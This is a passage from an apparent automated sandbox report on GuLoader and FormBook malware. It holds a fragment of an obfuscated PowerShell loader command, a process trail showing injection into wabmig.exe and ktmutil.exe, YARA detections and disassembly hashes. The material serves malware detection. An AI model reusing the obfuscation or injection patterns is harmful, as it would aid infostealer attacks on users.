sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;"
            Imagebase:0x1f0000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2218750416.000000000596A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2228656875.0000000008900000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2229243853.0000000009BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:true

            General

            Target ID:9
            Start time:08:45:19
            Start date:16/09/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:10
            Start time:08:45:38
            Start date:16/09/2024
            Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
            Imagebase:0xe30000
            File size:66'048 bytes
            MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:true

            General

            Target ID:11
            Start time:08:46:03
            Start date:16/09/2024
            Path:C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe"
            Imagebase:0x9c0000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            General

            Target ID:12
            Start time:08:46:06
            Start date:16/09/2024
            Path:C:\Windows\SysWOW64\ktmutil.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
            Imagebase:0x990000
            File size:15'360 bytes
            MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:false

            General

            Target ID:14
            Start time:08:46:18
            Start date:16/09/2024
            Path:C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe"
            Imagebase:0x9c0000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            General

            Target ID:15
            Start time:08:46:25
            Start date:16/09/2024
            Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
            Imagebase:0xe30000
            File size:66'048 bytes
            MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:false

            General

            Target ID:16
            Start time:08:46:30
            Start date:16/09/2024
            Path:C:\Program Files\Mozilla Firefox\firefox.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
            Imagebase:0x7ff6bf500000
            File size:676'768 bytes
            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:17
            Start time:08:46:33
            Start date:16/09/2024
            Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
            Imagebase:0xe30000
            File size:66'048 bytes
            MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            Disassembly

            Reset < >

              Executed Functions

              Function 00007FFD9B7DCDF6 Relevance: .5, Instructions: 475COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2405317062.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e276ed89f1e2717ddcd032ec627feed212c9ca4d40696ad25d4396af065a8d39
              • Instruction ID: f172d93a5abd64e48483f59eb1259492baf38b5ac51271b4b73bb0b2ff030870
              • Opcode Fuzzy Hash: e276ed89f1e2717ddcd032ec627feed212c9ca4d40696ad25d4396af065a8d39
              • Instruction Fuzzy Hash: 92F19530609B4D8FEBA8DF28C8557E977D1FF94350F04436AE84DC72A5DB38A9458B82
              Function 00007FFD9B7DDBA2 Relevance: .5, Instructions: 462COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2405317062.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a6d2cbdde0a401140b14f03670a45f3fc7dcd437a0898be15e5035621e369be6
              • Instruction ID: d460ec542f66a5b2d8c4ba56d6b717fea6f89bdcf345347af000fba97c5ff75c
              • Opcode Fuzzy Hash: a6d2cbdde0a401140b14f03670a45f3fc7dcd437a0898be15e5035621e369be6
              • Instruction Fuzzy Hash: 19E1D530A09A4D8FEBA8DF28C8557E977D1FF94350F05436ED84DC72A5CB78A9448B81
              Function 00007FFD9B8A7402 Relevance: .4, Instructions: 395COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2406148530.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37198aef973f1daaad9f0a1ee0c444f4eab59fd39157cb765fb9bd65d152f8d3
              • Instruction ID: 58d746820dd94eafb33ea3b71364c8175cbf4ccc02ec214ad04eb5884de706e8
              • Opcode Fuzzy Hash: 37198aef973f1daaad9f0a1ee0c444f4eab59fd39157cb765fb9bd65d152f8d3
              • Instruction Fuzzy Hash: C7C14732B0FA8E0FEBA5EBA888655B57BD1EF59610F0901FED05DC70E3DA18AD018351
              Function 00007FFD9B7DD7B6 Relevance: .3, Instructions: 335COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2405317062.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8127250c2744678f62aad39c4931c845e07816ad1764b5e3bbbb8c4dda369f8e
              • Instruction ID: 3adcfed69f4c28dd1c846ec44c54c4e8ad483bf7f0a3fc7a4116a425d549341a
              • Opcode Fuzzy Hash: 8127250c2744678f62aad39c4931c845e07816ad1764b5e3bbbb8c4dda369f8e
              • Instruction Fuzzy Hash: 95B1A53060DB4D4FDB69DF28C8557E93BD1FF59350F04426AE84DC72A5CA3499458B82
              Function 00007FFD9B8A485E Relevance: .3, Instructions: 319COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2406148530.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 182deef7fc3adf8785dd4aa90f7041d370c0c54f360ceb438da0023a086f76b8
              • Instruction ID: f328e1a3038a222f9e2b90305c5b58ac9cdc5127ecf506b922f99a087299a8e6
              • Opcode Fuzzy Hash: 182deef7fc3adf8785dd4aa90f7041d370c0c54f360ceb438da0023a086f76b8
              • Instruction Fuzzy Hash: 49A1E722B0FA8A0FEFA59B6848B15B876D1EF59350B5E01BED05DC31F3DE18AD058311
              Function 00007FFD9B8A4957 Relevance: .2, Instructions: 159COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2406148530.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9f084e7a734f8340d1c07f11ce658f584f41dca62349efed9aa958f88db811c
              • Instruction ID: deee8caaa0b99d2d1e43a6d50ff635d398917b9f1a929d0ff37681896cba4572
              • Opcode Fuzzy Hash: c9f084e7a734f8340d1c07f11ce658f584f41dca62349efed9aa958f88db811c
              • Instruction Fuzzy Hash: 90510722F1FA8A0FEFA5976848B15B866D2EF89250B5E01BED06CC71F7DE18BD044315
              Function 00007FFD9B8A4C13 Relevance: .2, Instructions: 150COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2406148530.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c57a72c0509c3fbe46e890a5b92ccc4e3621856e4bebf8741c80ee32ad52d41
              • Instruction ID: 6c2766b4f2a8536124c237384e8035998817e5cf77a59d6bb132c2b353f62985
              • Opcode Fuzzy Hash: 7c57a72c0509c3fbe46e890a5b92ccc4e3621856e4bebf8741c80ee32ad52d41
              • Instruction Fuzzy Hash: DF416052A4F7CA4FE7A397B808755A13FA19F17124B1D01FAD098CA1E3E91C6945C326
              Function 00007FFD9B7DD2B4 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2405317062.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 83caa9f5cf5dc4e4f46b33cd8f31e0f46768b287986cb8640fb7c5b4dcdda792
              • Instruction ID: b69966536ad39f092dff3efd5d4a511fc81ed358a46ffd240abad4be015d577a
              • Opcode Fuzzy Hash: 83caa9f5cf5dc4e4f46b33cd8f31e0f46768b287986cb8640fb7c5b4dcdda792
              • Instruction Fuzzy Hash: A531E030A1A64DCEFBB4DF54DC29BF93291FF81355F410379D40D860B2DA386A49CA11
              Function 00007FFD9B8A18DF Relevance: .1, Instructions: 86COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2406148530.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: da6c9c7b36bd5dae98cfc8e0839fb601f178672956e851aa3676101b539fa447
              • Instruction ID: 77bb13c3c6f20d993f0da552a318de871bd6a841e2a625e77fe7af153fc53554
              • Opcode Fuzzy Hash: da6c9c7b36bd5dae98cfc8e0839fb601f178672956e851aa3676101b539fa447
              • Instruction Fuzzy Hash: 7E21C453F0FACA1FE7A1A77818B52686AD1AF5A650B4A00FAD098C71F3D8186D49C361
              Function 00007FFD9B7D41E5 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.2405317062.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
              • Instruction ID: b0c7db0bf0617815102cbc2a23edc067c48046fb0b35d70c45a66addb4edc475
              • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
              • Instruction Fuzzy Hash: 7D01A73120CB0C4FD748EF4CE051AA5B3E0FB95360F10066DE58AC36A5D632E882CB41

              Executed Functions

              Function 048CF4A8 Relevance: .3, Instructions: 281COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 935f35eed6b83b39b84fe2c6c7f65b23110c55c32686f57006528a96b61f48db
              • Instruction ID: 34a384f19d8d04dd40bb95164c0f7ee6ed3e0faef1d8d45049fd427723bee47b
              • Opcode Fuzzy Hash: 935f35eed6b83b39b84fe2c6c7f65b23110c55c32686f57006528a96b61f48db
              • Instruction Fuzzy Hash: 55B13F71E00249CFEB14CFA9C885B9DBBF2AF88314F148A2DD615E7294EB74E845CB41
              Function 077B7EC8 Relevance: 23.2, Strings: 18, Instructions: 693COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
              • API String ID: 0-81657163
              • Opcode ID: 2844b2a2cd1c2716dc3b596734bd8588b0be61b16911cc7ea4bc91788e6cfc01
              • Instruction ID: a6e68e1f3ce7c141a301d77455bfa5444a14efb6c117a5b337ba380ecf310c2d
              • Opcode Fuzzy Hash: 2844b2a2cd1c2716dc3b596734bd8588b0be61b16911cc7ea4bc91788e6cfc01
              • Instruction Fuzzy Hash: D43208B1B0420ADFCB359E6994447EABBEAAFC5390F14887AD405CF351DA32D845C7E2
              Function 077B2A70 Relevance: 20.7, Strings: 16, Instructions: 657COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$84(l$84(l$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
              • API String ID: 0-2979691940
              • Opcode ID: 722c13181d6fd316af7885b68521aa870b3e257e46caa0d1045cbd90a2e79f8e
              • Instruction ID: a904fb3d0836ebd509d822d507dd3546a4d55c70bb6652018af8103f359cc274
              • Opcode Fuzzy Hash: 722c13181d6fd316af7885b68521aa870b3e257e46caa0d1045cbd90a2e79f8e
              • Instruction Fuzzy Hash: 95223871B052099FCB348F69D8147AABBE2FF85350F1488AAD805CF252DB35DC85C7A1
              Function 077B5020 Relevance: 18.5, Strings: 14, Instructions: 1008COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l$(f*l$(f*l$(f*l$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
              • API String ID: 0-1897727117
              • Opcode ID: 34ec60a75ba1bfeeda7ca010be7f27cdea7f3b32b5022e1946cef55843949bc1
              • Instruction ID: 0793c1faaba8070ddbfe0bdc7f4fc67f4adc5c3f53ddb2c37a31538894c9a0cc
              • Opcode Fuzzy Hash: 34ec60a75ba1bfeeda7ca010be7f27cdea7f3b32b5022e1946cef55843949bc1
              • Instruction Fuzzy Hash: 1782D4B0B00219DFD724DBA8C945B9EBBB2BF85344F1484A9D905AF355CB32EC85CB91
              Function 077B6810 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l$(f*l$(f*l$(f*l$(f*l$(f*l$(f*l$(f*l
              • API String ID: 0-29166847
              • Opcode ID: 0b62ccbafe4bb8bae3ec33f16b2b7cc4ae15fe19ecc2d2be101c0c792f02d060
              • Instruction ID: 4ef1f59cceb93690ef8104222fd0d3b46a5f281cc6a2972972e236f4d9799be4
              • Opcode Fuzzy Hash: 0b62ccbafe4bb8bae3ec33f16b2b7cc4ae15fe19ecc2d2be101c0c792f02d060
              • Instruction Fuzzy Hash: 08C174B0E00209DFDB348BA8C451BAAF7B2BF85750F14C869D9169B754CB32EC46CB91
              Function 077B6C48 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
              • API String ID: 0-2822668367
              • Opcode ID: 9a06b4b25c6f2c248b94c2e4ac6894017089001fea0484934723b0244dd23e4e
              • Instruction ID: 1dcb54edd5a90d827d5e949f04bc84492269cdc317979bf7021dd377ea551b94
              • Opcode Fuzzy Hash: 9a06b4b25c6f2c248b94c2e4ac6894017089001fea0484934723b0244dd23e4e
              • Instruction Fuzzy Hash: B3D1A4B4A002099FC714DFA8C955B9EBBB2AFC8340F14C465D901AF755CB72EC86CB91
              Function 077B74E8 Relevance: 5.7, Strings: 4, Instructions: 662COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l$(f*l$(f*l$(f*l
              • API String ID: 0-792637747
              • Opcode ID: b06eda61df6ebfea6718009363795ebfe8eac72da2dfc54a7185361a385dbc73
              • Instruction ID: 0b4d65390898f2b820ee4b6d5679d18de07faf72be64033aac6e8d3b493618e0
              • Opcode Fuzzy Hash: b06eda61df6ebfea6718009363795ebfe8eac72da2dfc54a7185361a385dbc73
              • Instruction Fuzzy Hash: 00426EB4B10209AFD714CB98C585FA9BBB2BF89354F14C469E805AF355CB72EC42CB91
              Function 077BA020 Relevance: 5.6, Strings: 4, Instructions: 584COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q
              • API String ID: 0-1420252700
              • Opcode ID: 404aba836a0c1343cbbbf72b989cb3bc79668e831d287c182d44998d7f5ee939
              • Instruction ID: 796ee953ee0b4e0598e18d2720648affde72f48207d4eef00eb58cf545c6f4d5
              • Opcode Fuzzy Hash: 404aba836a0c1343cbbbf72b989cb3bc79668e831d287c182d44998d7f5ee939
              • Instruction Fuzzy Hash: 891249B1B043098FCB35AB6C98017EABBE29FC6350F15C87AD905DB251DE32D946C7A1
              Function 077B5A33 Relevance: 5.4, Strings: 4, Instructions: 395COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l$(f*l$4'^q$4'^q
              • API String ID: 0-1683028131
              • Opcode ID: 3173a3226bc6b74a8e1ca546c2599c236b29eed8721ae1017a17a0117825845e
              • Instruction ID: 3dd9da7848278fb23d93d66ebbf951b660ea48a0557a9260fbc85c8cd652b22c
              • Opcode Fuzzy Hash: 3173a3226bc6b74a8e1ca546c2599c236b29eed8721ae1017a17a0117825845e
              • Instruction Fuzzy Hash: 17F1D1B0A002199FD724DB68CD55F9EBBB3AF84340F1084A5D909AF795CB71EC828F91
              Function 077B67F3 Relevance: 5.3, Strings: 4, Instructions: 286COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l$(f*l$(f*l$(f*l
              • API String ID: 0-792637747
              • Opcode ID: 8d034edda8169f6c5bb559a3cdc8241fe4feef69dcc1f6bce0416f94a0c128b2
              • Instruction ID: 5796b16ad25f9458f76e37c9ffa0e24aa11d3810b5e133c4aaae9cc7dd2014ca
              • Opcode Fuzzy Hash: 8d034edda8169f6c5bb559a3cdc8241fe4feef69dcc1f6bce0416f94a0c128b2
              • Instruction Fuzzy Hash: 15B183B4A00205DFDB30CF94C481BAAF7B2BF85754F24C969DA16AB754CB32E846CB51
              Function 048CB9B0 Relevance: 4.3, Strings: 3, Instructions: 523COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: Hbq$$^q$$^q
              • API String ID: 0-1611274095
              • Opcode ID: 40cf26f618ec2d62dddaf01c621f9159e7595b24e2751aa02f9cf19516be595b
              • Instruction ID: 7931795a74064ceece6a75284869711cac6fc48fac66fc1c53b82081df507e68
              • Opcode Fuzzy Hash: 40cf26f618ec2d62dddaf01c621f9159e7595b24e2751aa02f9cf19516be595b
              • Instruction Fuzzy Hash: 22222E307006189FDB25DB68D854AAEB7B2BF89304F1445A9D80AEB361DF35ED85CF81
              Function 077B6023 Relevance: 4.2, Strings: 3, Instructions: 438COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l$(f*l$(f*l
              • API String ID: 0-1649080014
              • Opcode ID: 686b794a356523eb64824ee3b84bceebd2e5cadde5439021910acbe5a4ed326c
              • Instruction ID: a6cf3bba0b418c70c61ad79b32b9c9c3cdbebdabdcc030137fd9c47cffc39126
              • Opcode Fuzzy Hash: 686b794a356523eb64824ee3b84bceebd2e5cadde5439021910acbe5a4ed326c
              • Instruction Fuzzy Hash: 6E0291B4A00204DFD724DB58C951F9ABBB2BF89344F14C4A9DA05AB756CB72EC82CF51
              Function 077B87D8 Relevance: 4.0, Strings: 3, Instructions: 289COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$$^q
              • API String ID: 0-953868773
              • Opcode ID: f179b90dce2f3ac67880f59f3bbf48005baff29724acf4413251aa18d7567ed7
              • Instruction ID: db8b1abd0f48aa1dca7f09a32dce953c8268a28c6d03b8d66dced22ff58b134a
              • Opcode Fuzzy Hash: f179b90dce2f3ac67880f59f3bbf48005baff29724acf4413251aa18d7567ed7
              • Instruction Fuzzy Hash: FDA129B0B043459FCB259A7888157BA7BE6AF86390F1488BAD541CF392DA35DC45C3E3
              Function 077B6C28 Relevance: 4.0, Strings: 3, Instructions: 269COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
